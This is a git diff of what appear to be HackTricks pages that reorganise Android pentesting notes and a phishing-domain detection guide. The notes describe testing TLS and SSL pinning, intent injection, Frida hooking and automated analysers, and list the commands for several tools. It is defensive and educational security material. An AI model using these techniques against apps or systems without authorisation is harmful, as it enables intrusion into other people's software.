@@ -394,13 +395,13 @@ Note that if you find the correct endpoints inside the application you may be ab
An [interesting bug bounty report](https://hackerone.com/reports/855618) about links (_/.well-known/assetlinks.json_).
-## Insufficient Transport Layer Protection
+### Insufficient Transport Layer Protection
* **Lack of Certificate Inspection:** Android Application fails to verify the identity of the certificate presented to it. Most of the application ignore the warnings and accept any self-signed certificate presented. Some Application instead pass the traffic through an HTTP connection.
* **Weak Handshake Negotiation:** Application and server perform an SSL/TLS handshake but use an insecure cipher suite which is vulnerable to MITM attacks. So any attacker can easily decrypt that connection.
* **Privacy Information Leakage:** Most of the times it happens that Applications do authentication through a secure channel but rest all connection through non-secure channel. That doesn’t add to security of application because rest sensitive data like session cookie or user data can be intercepted by an malicious user.
-From the 3 scenarios presented we are going to discuss **how to verify the identity of the certificate**. The other 2 scenarios depends on the **TLS configuratio**n of the server and if the **application sends unencrypted data**. The pentester should check by it's own the TLS configuration of the server ([here](../../pentesting/pentesting-web/#ssl-tls-vulnerabilites)) and detect if any **confidential information is sent by an unencrypted/vulnerable** channel .\
+From the 3 scenarios presented we are going to discuss **how to verify the identity of the certificate**. The other 2 scenarios depends on the **TLS configuratio**n of the server and if the **application sends unencrypted data**. The pentester should check by it's own the TLS configuration of the server ([here](../../network-services-pentesting/pentesting-web/#ssl-tls-vulnerabilites)) and detect if any **confidential information is sent by an unencrypted/vulnerable** channel .\
More information about how to discover and fix these kind of vulnerabilities [**here**](https://manifestsecurity.com/android-application-security-part-10/).
**SSL Pinning**
@@ -409,7 +410,7 @@ By default, when making an SSL connection, the client(android app) checks that t
In certificate Pinnning, an Android Application itself contains the certificate of server and only transmit data if the same certificate is presented.\
It's recommended to **apply SSL Pinning** for the sites where sensitive information is going to be sent.
-## Inspecting HTTP traffic
+### Inspecting HTTP traffic
First of all, you should (must) **install the certificate** of the **proxy** tool that you are going to use, probably Burp. If you don't install the CA certificate of the proxy tool, you probably aren't going to see the encrypted traffic in the proxy.\
**Please,** [**read this guide to learn how to do install a custom CA certificate**](android-burp-suite-settings.md)**.**
@@ -431,7 +432,7 @@ Here I'm going to present a few options I've used to bypass this protection:
Note that in this step you should look for common web vulnerabilities. A lot of information about web vulnerabilities be found in this book so I'm not going to mention them here.
-## Frida
+### Frida
Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. Learn more at [www.frida.re](https://www.frida.re).\
**It's amazing, you can access running application and hook methods on run time to change the behaviour, change values, extract values, run different code...**\
@@ -442,17 +443,17 @@ Dynamic instrumentation toolkit for developers, reverse-engineers, and security
**Some other abstractions based on Frida:** [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)\
**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
-## **Android Application Analyzer**
+### **Android Application Analyzer**
This tool could help you managing different tools during the dynamic analysis: [https://github.com/NotSoSecure/android\_application\_analyzer](https://github.com/NotSoSecure/android\_application\_analyzer)
-## Intent Injection
+### Intent Injection
This vulnerability resembles **Open Redirect in web security**. Since class `Intent` is `Parcelable`, **objects belonging to this class** can be **passed** as **extra** **data** in another `Intent` object.\
Many developers make **use** of this **feature** and create **proxy** **components** (activities, broadcast receivers and services) that **take an embedded Intent and pass it to dangerous methods** like `startActivity(...)`, `sendBroadcast(...)`, etc.\
This is dangerous because **an attacker can force the app to launch a non-exported component that cannot be launched directly from another app**, or to grant the attacker access to its content providers. **`WebView`** also sometimes changes a **URL from a string to an `Intent`** object, using the `Intent.parseUri(...)` method, and passes it to `startActivity(...)`.
-## Android Client Side Injections and others
+### Android Client Side Injections and others
Probably you know about this kind of vulnerabilities from the Web. You have to be specially careful with this vulnerabilities in an Android application:
@@ -462,9 +463,9 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
* **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
-# Automatic Analysis
+## Automatic Analysis
-## [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
+### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
**Static analysis**
@@ -482,7 +483,7 @@ Also, if you create a **ZIP** file with the source code if an **Android** or an
MobSF also allows you to **diff/Compare** analysis and to integrate **VirusTotal** (you will need to set your API key in _MobSF/settings.py_ and enable it: `VT_ENABLED = TRUE` `VT_API_KEY = ` `VT_UPLOAD = TRUE`). You can also set `VT_UPLOAD` to `False`, then the **hash** will be **upload** instead of the file.
-## Assisted Dynamic analysis with MobSF
+### Assisted Dynamic analysis with MobSF
**MobSF** can also be very helpful for **dynamic analysis** in **Android**, but in that case you will need to install MobSF and **genymotion** in your host (a VM or Docker won't work). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
The **MobSF dynamic analyser** can:
@@ -542,7 +543,7 @@ adb shell settings put global http_proxy :0
```
{% endhint %}
-## Assisted Dynamic Analysis with Inspeckage
+### Assisted Dynamic Analysis with Inspeckage
You can get the tool from [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
This tool with use some **Hooks** to let you know **what is happening in the application** while you perform a **dynamic analysis**.
@@ -551,13 +552,13 @@ This tool with use some **Hooks** to let you know **what is happening in the app
[inspeckage-tutorial.md](inspeckage-tutorial.md)
{% endcontent-ref %}
-## [Yaazhini](https://www.vegabird.com/yaazhini/)
+### [Yaazhini](https://www.vegabird.com/yaazhini/)
This is a **great tool to perform static analysis with a GUI**
.png>)
-## [Qark](https://github.com/linkedin/qark)
+### [Qark](https://github.com/linkedin/qark)
This tool is designed to look for several **security related Android application vulnerabilities**, either in **source code** or **packaged APKs**. The tool is also **capable of creating a "Proof-of-Concept" deployable APK** and **ADB commands**, to exploit some of the found vulnerabilities (Exposed activities, intents, tapjacking...). As with Drozer, there is no need to root the test device.
@@ -568,7 +569,7 @@ qark --java path/to/parent/java/folder
qark --java path/to/specific/java/file.java
```
-## [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
+### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
* Displays all extracted files for easy reference
* Automatically decompile APK files to Java and Smali format
@@ -594,7 +595,7 @@ qark --java path/to/specific/java/file.java
reverse-apk relative/path/to/APP.apk
```
-## [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
+### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
SUPER is a command-line application that can be used in Windows, MacOS X and Linux, that analyzes _.apk_ files in search for vulnerabilities. It does this by decompressing APKs and applying a series of rules to detect those vulnerabilities.
@@ -606,7 +607,7 @@ Download the latest binaries from in the [download page](https://superanalyzer.r
super-analyzer {apk_file}
```
-## [StaCoAn](https://github.com/vincentcox/StaCoAn)
+### [StaCoAn](https://github.com/vincentcox/StaCoAn)
.png>)
@@ -620,7 +621,7 @@ Download[ latest release](https://github.com/vincentcox/StaCoAn/releases):
./stacoan
```
-## [AndroBugs](https://github.com/AndroBugs/AndroBugs\_Framework)
+### [AndroBugs](https://github.com/AndroBugs/AndroBugs\_Framework)
AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications.\
[Windows releases](https://github.com/AndroBugs/AndroBugs\_Framework/releases)
@@ -630,7 +631,7 @@ python androbugs.py -f [APK file]
androbugs.exe -f [APK file]
```
-## [Androwarn](https://github.com/maaaaz/androwarn)
+### [Androwarn](https://github.com/maaaaz/androwarn)
**Androwarn** is a tool whose main aim is to detect and warn the user about potential malicious behaviours developped by an Android application.
@@ -642,7 +643,7 @@ This tool looks for **common behavior of "bad" applications** like: Telephony id
python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
```
-## [MARA Framework](https://github.com/xtiankisutsa/MARA\_Framework)
+### [MARA Framework](https://github.com/xtiankisutsa/MARA\_Framework)
.png>)
@@ -657,15 +658,15 @@ It is able to:
* Analyze found domains using: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb)
* Deobfuscate APK via [apk-deguard.com](http://www.apk-deguard.com)
-## Koodous
+### Koodous
Useful to detect malware: [https://koodous.com/](https://koodous.com)
-# Obfuscating/Deobfuscating code
+## Obfuscating/Deobfuscating code
Note that depending the service and configuration you use to obfuscate the code. Secrets may or may not ended obfuscated.
-## [ProGuard](https://en.wikipedia.org/wiki/ProGuard\_\(software\))
+### [ProGuard](https://en.wikipedia.org/wiki/ProGuard\_\(software\))
**ProGuard** is an open source command-line tool that shrinks, optimizes and obfuscates Java code. It is able to optimize bytecode as well as detect and remove unused instructions. ProGuard is free software and is distributed under the GNU General Public License, version 2.
@@ -673,40 +674,40 @@ ProGuard is distributed as part of the Android SDK and runs when building the ap
From: [https://en.wikipedia.org/wiki/ProGuard\_(software)](https://en.wikipedia.org/wiki/ProGuard\_\(software\))
-## [DeGuard](http://apk-deguard.com)
+### [DeGuard](http://apk-deguard.com)
**DeGuard reverses the process of obfuscation performed by Android obfuscation tools. This enables numerous security analyses, including code inspection and predicting libraries.**
You can upload an obfuscated APK to their platform.
-## [Simplify](https://github.com/CalebFenton/simplify)
+### [Simplify](https://github.com/CalebFenton/simplify)
It is a **generic android deobfuscator.** Simplify **virtually executes an app** to understand its behavior and then **tries to optimize the code** so it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn't matter what the specific type of obfuscation is used.
-## [APKiD](https://github.com/rednaga/APKiD)
+### [APKiD](https://github.com/rednaga/APKiD)
APKiD gives you information about **how an APK was made**. It identifies many **compilers**, **packers**, **obfuscators**, and other weird stuff. It's [_PEiD_](https://www.aldeid.com/wiki/PEiD) for Android.
-## Manual
+### Manual
[Read this tutorial to learn some tricks on **how to reverse custom obfuscation**](manual-deobfuscation.md)
-# Labs
+## Labs
-## [Androl4b](https://github.com/sh4hin/Androl4b)
+### [Androl4b](https://github.com/sh4hin/Androl4b)
AndroL4b is an Android security virtual machine based on ubuntu-mate includes the collection of latest framework, tutorials and labs from different security geeks and researchers for reverse engineering and malware analysis.
-## OWASP
+### OWASP
{% embed url="https://github.com/OWASP/owasp-mstg%0Ahttps://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication" %}
-## Git Repos
+### Git Repos
[https://github.com/riddhi-shree/nullCommunity/tree/master/Android](https://github.com/riddhi-shree/nullCommunity/tree/master/Android)\
[https://www.youtube.com/watch?v=PMKnPaGWxtg\&feature=youtu.be\&ab\_channel=B3nacSec](https://www.youtube.com/watch?v=PMKnPaGWxtg\&feature=youtu.be\&ab\_channel=B3nacSec)
-# References
+## References
For more information visit:
@@ -715,7 +716,7 @@ For more information visit:
* [https://manifestsecurity.com/android-application-security/](https://manifestsecurity.com/android-application-security/)
* [https://github.com/Ralireza/Android-Security-Teryaagh](https://github.com/Ralireza/Android-Security-Teryaagh)
-# To Test
+## To Test
* [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
diff --git a/mobile-apps-pentesting/android-app-pentesting/adb-commands.md b/mobile-pentesting/android-app-pentesting/adb-commands.md
similarity index 100%
rename from mobile-apps-pentesting/android-app-pentesting/adb-commands.md
rename to mobile-pentesting/android-app-pentesting/adb-commands.md
diff --git a/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md
similarity index 96%
rename from mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md
rename to mobile-pentesting/android-app-pentesting/android-applications-basics.md
index a55df7f9..f596ff3a 100644
--- a/mobile-apps-pentesting/android-app-pentesting/android-applications-basics.md
+++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md
@@ -1,5 +1,7 @@
# Android Applications Basics
+## Android Applications Basics
+
-
-# Android Security Model
+## Android Security Model
**There are two layers:**
* The **OS**, which keeps installed applications isolated from one another.
* The **application itself**, which allows developers to **expose certain functionalities** and configures application capabilities.
-## UID Separation
+### UID Separation
**Each application is assigned a specific User ID**. This is done during the installation of the app so t**he app can only interact with files owned by its User ID or shared** files. Therefore, only the app itself, certain components of the OS and the root user can access the apps data.
-## UID Sharing
+### UID Sharing
**Two applications can be configured to use the same UID**. This can be useful to share information, but if one of them is compromised the data of both applications will be compromised. This is why this behaviour is **discourage**.\
**To share the same UID, applications must define the same `android:sharedUserId` value in their manifests.**
-## Sandboxing
+### Sandboxing
The **Android Application Sandbox** allows to run **each application** as a **separate process under a separate user ID**. Each process has its own virtual machine, so an app’s code runs in isolation from other apps.\
From Android 5.0(L) **SELinux** is enforced. Basically, SELinux denied all process interactions and then created policies to **allow only the expected interactions between them**.
-## Permissions
+### Permissions
When you installs an **app and it ask for permissions**, the app is asking for the permissions configured in the **`uses-permission`** elements in the **AndroidManifest.xml** file. The **uses-permission** element indicates the name of the requested permission inside the **name** **attribute.** It also has the **maxSdkVersion** attribute which stops asking for permissions on versions higher than the one specified.\
Note that android applications don't need to ask for all the permissions at the beginning, they can also **ask for permissions dynamically** but all the permissions must be **declared** in the **manifest.**
@@ -54,7 +55,7 @@ A permission element has three attributes:
* **Signature**: Only **apps signed by the same certificate as the one** exporting the component can be granted permission. This is the strongest type of protection.
* **SignatureOrSystem**: Only **apps signed by the same certificate as the one** exporting the component or **apps running with system-level access** can be granted permissions
-# Pre-Installed Applications
+## Pre-Installed Applications
These apps are generally found in the **`/system/app`** or **`/system/priv-app`** directories and some of them are **optimised** (you may not even find the `classes.dex` file). Theses applications are worth checking because some times they are **running with too many permissions** (as root).
@@ -62,7 +63,7 @@ These apps are generally found in the **`/system/app`** or **`/system/priv-app`*
* Added by the device **manufacturer**
* Added by the cell **phone provider** (if purchased from them)
-# Rooting
+## Rooting
In order to obtain root access into a physical android device you generally need to **exploit** 1 or 2 **vulnerabilities** which use to be **specific** for the **device** and **version**.\
Once the exploit has worked, usually the Linux `su` binary is copied into a location specified in the user's PATH env variable like `/system/xbin`.
@@ -73,22 +74,22 @@ Once the su binary is configured, another Android app is used to interface with
Note that the rooting process is very dangerous and can damage severely the device
{% endhint %}
-## ROMs
+### ROMs
It's possible to **replace the OS installing a custom firmware**. Doing this it's possible to extend the usefulness of an old device, bypass software restrictions or gain access to the latest Android code.\
**OmniROM** and **LineageOS** are two of the most popular firmwares to use.
Note that **not always is necessary to root the device** to install a custom firmware. **Some manufacturers allow** the unlocking of their bootloaders in a well-documented and safe manner.
-## Implications
+### Implications
Once a device is rooted, any app could request access as root. If a malicious application gets it, it can will have access to almost everything and it will be able to damage the phone.
-# Android Application Fundamentals
+## Android Application Fundamentals
This introduction is taken from [https://maddiestone.github.io/AndroidAppRE/app\_fundamentals.html](https://maddiestone.github.io/AndroidAppRE/app\_fundamentals.html)
-## Fundamentals Review
+### Fundamentals Review
* Android applications are in the _APK file format_. **APK is basically a ZIP file**. (You can rename the file extension to .zip and use unzip to open and see its contents.)
* APK Contents (Not exhaustive)
@@ -112,7 +113,7 @@ This introduction is taken from [https://maddiestone.github.io/AndroidAppRE/app\
* res/
* the directory containing resources not compiled into resources.arsc
-## **Dalvik & Smali**
+### **Dalvik & Smali**
Most Android applications are written in Java. Kotlin is also supported and interoperable with Java. For ease, for the rest of this workshop, when I refer to “Java”, you can assume that I mean “Java or Kotlin”. **Instead of the Java code being run in Java Virtual Machine** (JVM) like desktop applications, in Android, the **Java is compiled to the \_Dalvik Executable (DEX) bytecode**\_\*\* format\*\*. For earlier versions of Android, the bytecode was translated by the Dalvik virtual machine. For more recent versions of Android, the Android Runtime (ART) is used.\
If developers, write in Java and the code is compiled to DEX bytecode, to reverse engineer, we work the opposite direction.\
@@ -124,7 +125,7 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
**Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term “Smali” to refer to instructions. If you’ve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**.
-# Intents
+## Intents
Intents are the primary means by which Android apps communicate between their components or with other apps. These message objects can also carry data between apps or component, similar to how GET/POST requests are used in HTTP communications.
@@ -139,7 +140,7 @@ To be simple Intent can be used:
Improper implementation could result in data leakage, restricted functions being called and program flow being manipulated.
-## Intent-Filter
+### Intent-Filter
An Intent Filter specify the **types of Intent that an activity, service, or Broadcast Receiver can respond to**. It specifies what an activity or service can do and what types of broadcasts a Receiver can handle. It allows the corresponding component to receive Intents of the declared type. Intent Filters are typically **defined via the AndroidManifest.xml file**. For **Broadcast Receiver** it is also possible to define them in **coding**. An Intent Filter is defined by its category, action and data filters. It can also contain additional metadata.
@@ -148,7 +149,7 @@ developers can **explicitly make components private** (regardless of any intent
by setting the \*\* `exported` attribute to `false`\*\* for each component in the manifest file.\
Developers can also set the **`permission`** attribute to **require a certain permission to access** the component, thereby restricting access to the component.
-## Implicit Intents
+### Implicit Intents
Intents are programatically created using an Intent constructor:
@@ -173,7 +174,7 @@ An intent-filter needs to match the **action**, **data** and **category** to rec
The "Intent resolution" process determine which app should receive each message. This process considers the **priority attribute**, which can be set in the i**ntent-filter declaration**, and t**he one with the higher priority will be selected**. This priority can be set between -1000 and 1000 and applications can use the `SYSTEM_HIGH_PRIORITY` value. If a **conflict** arises, a "choser" Window appears so the **user can decide**.
-## Explicit Intents
+### Explicit Intents
An explicit intent specifies the class name it's targeting:
@@ -189,11 +190,11 @@ intent.setClassName("com.other.app", "com.other.app.ServiceName");
context.startService(intent);
```
-## Pending Intents
+### Pending Intents
These allow other applications to **take actions on behalf of your application**, using your app's identity and permissions. Constructing a Pending Intent it should be **specified an intent and the action to perform**. If the **declared intent isn't Explicit** (doesn't declare which intent can call it) a **malicious application could perform the declared action** on behalf of the victim app. Moreover, **if an action ins't specified**, the malicious app will be able to do **any action on behalf the victim**.
-## Broadcast Intents
+### Broadcast Intents
Unlike the previous intents, which are only received by one app, broadcast intents **can be received by multiple apps**. However, from API version 14, it's **possible to specify the app that should receive** the message using Intent.set Package.
@@ -204,7 +205,7 @@ There are **two types** of Broadcasts: **Normal** (asynchronous) and **Ordered**
It's possible to **send** a **broadcast** using the function \*\*`sendBroadcast(intent, receiverPermission)` \*\* from the `Context` class.\
You could also use the function **`sendBroadcast`** from the **`LocalBroadCastManager`** ensures the **message never leaves the app**. Using this you won't even need to export a receiver component.
-## Sticky Broadcasts
+### Sticky Broadcasts
This kind of Broadcasts **can be accessed long after they were sent**.\
These were deprecated in API level 21 and it's recommended to **not use them**.\
@@ -212,7 +213,7 @@ These were deprecated in API level 21 and it's recommended to **not use them**.\
If you find functions containing the word "sticky" like **`sendStickyBroadcast`** or **`sendStickyBroadcastAsUser`**, **check the impact and try to remove them**.
-# Deep links / URL schemes
+## Deep links / URL schemes
**Deep links allow to trigger an Intent via URL**. An application can declare an **URL schema** inside and activity so every time the Android device try to **access an address using that schema** the applications activity will be called:
@@ -240,11 +241,11 @@ In this case you could try to abuse the functionality creating a web with the fo
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
- (1) (1) (1).png>)
+ (1) (1).png>)
Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links).
-# AIDL - Android Interface Definition Language
+## AIDL - Android Interface Definition Language
The **Android Interface Definition Language** (AIDL) allows you to define the programming interface that both the client and service agree upon in order to **communicate with each other using interprocess communication** (IPC). On Android, **one process cannot normally access the memory of another process**. So to talk, they need to decompose their objects into primitives that the **operating system** can understand, and marshall the objects across that boundary for you. The code to do that marshalling is tedious to write, so Android handles it for you with AIDL.).
@@ -252,19 +253,19 @@ Services using AIDL are referred to as **Bound Services**. In the Service's clas
A bound service is the server in a client-server interface. **It allows components (such as activities) to bind to the service, send requests, receive responses, and perform interprocess communication** (IPC). A bound service typically lives only while it serves another application component and does not run in the background indefinitely.
-## Messenger
+### Messenger
A Messenger is another type of IPC mechanism. Since the **Messenger is also a "Bound Service"**, the data passed from the client app is also processed through the `onBind` method. So, the code review should start on this method and you should look for the invocation of sensitive functionality or unsafe handling of data.
-## Binder
+### Binder
It's weird to find a Binder class directly invoked as it's much easier to use AIDL (which abstracts the Binder class). However, it's good to know that **Binder is a kernel-level driver which moves data from one process's memory to another's** ([https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8)).
-# Components
+## Components
These include: **Activities, Services, Broadcast Receivers and Providers.**
-## Launcher Activity and other activities
+### Launcher Activity and other activities
An **Android activity** is one screen of the **Android** app's user interface. In that way an **Android activity** is very similar to windows in a desktop application. An **Android** app may contain one or more activities, meaning one or more screens.
@@ -292,13 +293,13 @@ Also, **some activities returns data to a caller**. In these scenarios you need
**The code of an activity starts with the `onCreate` method.**
-## Application Subclass
+### Application Subclass
Android applications can define a **subclass** of [Application](https://developer.android.com/reference/android/app/Application). Applications can, but do not have to define a custom subclass of Application. If an Android app defines an Application subclass, t**his class is instantiated prior to any other class in the application**.
If the **`attachBaseContext`** method is defined in the Application subclass, it is called first, before the **`onCreate`** method.
-## Services
+### Services
[Services](https://developer.android.com/guide/components/services) **run in the background without a UI.** They are used to perform **long-running processes, even if the user starts using a different application**.
@@ -316,7 +317,7 @@ A **service can be exported which allows other processes on the device to start
` element can have multiple children, each specifying a different di
[More information about FileProviders here](https://developer.android.com/training/secure-file-sharing/setup-sharing).
-# WebViews
+## WebViews
WebViews are effectively **web browsers** embedded into Android Apps.\
WebViews content can be pulled from remote sites or can be files included in the app.\
@@ -421,21 +422,21 @@ By default, local files can be accessed by WebViews via file:// URLs, but there
* The method **`setAllowFileAccess`** indicates if a path from a `file://` URL should be able to access the content from other file scheme URLs.
* The method **`setAllowUniversalAccessFromFileURLs`** indicates if a path from a `file://` URL should be able to access content from any origin.
-# Other App components
+## Other App components
-## **Application Signing**
+### **Application Signing**
* Android requires that **all apps be digitally signed with a certificate** before they can be installed. Android uses this certificate to identify the author of an app.
* To run application on the device, it should be signed.When application is installed on to a device the **package manager verifies** that whether the application has been properly signed with the certificate in the apk file or not.
* Application can be self signed or can be signed through CA.
* Application signing ensures that one application can’t access any other application except through well-defined IPC and also that it is passed unmodified to the device.
-## **Application Verification**
+### **Application Verification**
* Android 4.2 and later support application verification. Users can choose to enable “Verify Apps” and have applications evaluated by an application verifier prior to installation.
* App verification can alert the user if they try to install an app that might be harmful; if an application is especially bad, it can block installation.
-# Mobile Device Management
+## Mobile Device Management
MDM or Mobile Device Management are software suits that are used to **ensure a control and security requirements** over mobile devices. These suites use the features referred as Device Administration API and require an Android app to be installed.
diff --git a/mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md b/mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md
similarity index 100%
rename from mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md
rename to mobile-pentesting/android-app-pentesting/android-burp-suite-settings.md
diff --git a/mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md b/mobile-pentesting/android-app-pentesting/android-task-hijacking.md
similarity index 100%
rename from mobile-apps-pentesting/android-app-pentesting/android-task-hijacking.md
rename to mobile-pentesting/android-app-pentesting/android-task-hijacking.md
diff --git a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md b/mobile-pentesting/android-app-pentesting/apk-decompilers.md
similarity index 99%
rename from mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md
rename to mobile-pentesting/android-app-pentesting/apk-decompilers.md
index e38962fc..0f02d0ef 100644
--- a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md
+++ b/mobile-pentesting/android-app-pentesting/apk-decompilers.md
@@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
## [JD-Gui](https://github.com/java-decompiler/jd-gui)
First famous gui Java decompiler, you could use it to investigate the Java code from the APK once you have obtained it.
@@ -53,7 +52,7 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s
**Only for Windows.**
- (1) (1).png>)
+ (1).png>)
## [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
diff --git a/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md b/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
similarity index 97%
rename from mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md
rename to mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
index 6a1d5d63..6a4ab9ab 100644
--- a/mobile-apps-pentesting/android-app-pentesting/avd-android-virtual-device.md
+++ b/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
@@ -1,5 +1,7 @@
# AVD - Android Virtual Device
+## AVD - Android Virtual Device
+
Support HackTricks and get benefits!
@@ -16,17 +18,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)Support HackTricks and get benefits!
@@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
@@ -16,26 +16,25 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Introduction
+## Introduction
In order to detect a phishing attempt it's important to **understand the phishing techniques that are being used nowadays**. In the parent page of this post you can find this information, so if you aren't aware of which techniques are being used today I recommend you to go to the parent page and read at least that section.
This post is based in the idea that the **attackers will try to somehow mimic or used the victim's domain name**. If your domain is called `example.com` and you receive a phishing that is using a completely different domain name for some reason like `youwonthelottery.com`, this techniques aren't going to uncover it.
-# Domain name variations
+## Domain name variations
It's kind of **easy** to **uncover** those **phishing** attempts that will use a **similar domain** name inside the email.\
It's enough to **generate a list of the most probable phishing names** that an attacker may use and **check** if it's **registered** or just check if there is any **IP** using it.
-## Finding suspicions domains
+### Finding suspicions domains
For this purpose you can use any of the following tools. Note that these tolls will also perform DNS requests automatically to check if the domain has any IP assigned to it:
* [**dnstwist**](https://github.com/elceef/dnstwist)
* [**urlcrazy**](https://github.com/urbanadventurer/urlcrazy)
-## Bitflipping
+### Bitflipping
In the world of computing, everything is stored in bits (zeros and ones) in memory behind the scenes.\
This applies to domains too. For example, _windows.com_ becomes _01110111..._ in the volatile memory of your computing device.\
@@ -49,44 +48,43 @@ For more information read [https://www.bleepingcomputer.com/news/security/hijack
**All possible bit-flipping domain names should be also monitored.**
-## Basic checks
+### Basic checks
Once you have a list of potential suspicions domain names you should **check** them (mainly the ports HTTP and HTTPS) to **see if they are using some login form similar** to someone of the victim's domain.\
You could also check the port 3333 to see if it's open and running an instance of `gophish`.\
It's also interesting to know **how old each discovered suspicions domain is**, the younger it's the riskier it is.\
You can also get **screenshots** of the HTTP and/or HTTPS suspicious web page to see if it's really suspicious and in that case **access it to take a deeper look**.
-## Advanced checks
+### Advanced checks
If you want to go one step further I would recommend you to **monitor those suspicious domains and search for more** once in a while (every day? it only takes a few seconds/minutes). You should also **check** the open **ports** of the related IPs and **search for instances of `gophish` or similar tools** (yes, attackers also make mistakes) and **monitor the HTTP and HTTPS web pages of the suspicions domains and subdomains** to see if they have copied any login form from the victims web pages.\
In order to **automate this** I would recommend to to have a list of login forms of the victims domains, spider the suspicions web pages and compare each login form found inside the suspicions domains with each login form of the victim's domain using something like `ssdeep`.\
If you have located the login forms of the suspicions domains you can try to **send junk credentials** and **check if it's redirecting you to the victims domain**.
-# Domain names using keywords
+## Domain names using keywords
The parent page also mentions a domain name variation technique that consist on putting the **victim's domain name inside a bigger domain** (e.g. paypal-financial.com for paypal.com).
-## Certificate Transparency
+### Certificate Transparency
It's not possible to take the previous "Brute-Force" approach but it's actually **possible to uncover this phishing attempts** also thanks to certificate transparency. Every time a certificate is emitted by a CA, the details are made public. This means that reading the certificate transparency or even monitoring it, it's **possible to find domains that are using a keyword inside it's name** For example, if attackers generates a certificate of [https://paypal-financial.com](https://paypal-financial.com), seeing the certificate it's possible to find the keyword "paypal" and know that that suspicions email is being used.
The post [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/) suggest that you can use Censys to search for certificates affecting a specific keyword and filter by date (only "new" certificates) and by the CA issuer "Let's Encrypt":
-.png>)
+.png>)
However, you can do "the same" using the free web [**crt.sh**](https://crt.sh). You can **search for the keyword** and the **filter** the results **by date and CA** if you whish.
-.png>)
+.png>)
Using this last option you can even use the field Matching Identities to see if any identity from the real domain matches any of the suspicious domain (note that a suspicious domain can be a false positive).
-**Another alternative** is the fantastic project called [**CertStream**](https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067). CertStream provides a real-time stream of newly generated certificates which you can use to detect specified keywords in (near) real-time. In fact, there is a project called [**phishing_catcher**](https://github.com/x0rz/phishing_catcher) that does just like that.
+**Another alternative** is the fantastic project called [**CertStream**](https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067). CertStream provides a real-time stream of newly generated certificates which you can use to detect specified keywords in (near) real-time. In fact, there is a project called [**phishing\_catcher**](https://github.com/x0rz/phishing\_catcher) that does just like that.
-## **New domains**
+### **New domains**
**One last alternative** is to gather a list of **newly registered domains** for some TLDs ([Whoxy](https://www.whoxy.com/newly-registered-domains/) provides such service) and **check the keywords in these domains**. However, long domains usually uses one or more subdomains, therefore the keyword won't appear inside the FLD and you won't be able to find the phishing subdomain.
-
Support HackTricks and get benefits!
@@ -102,5 +100,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
Microsoft Word performs file data validation prior to opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened.
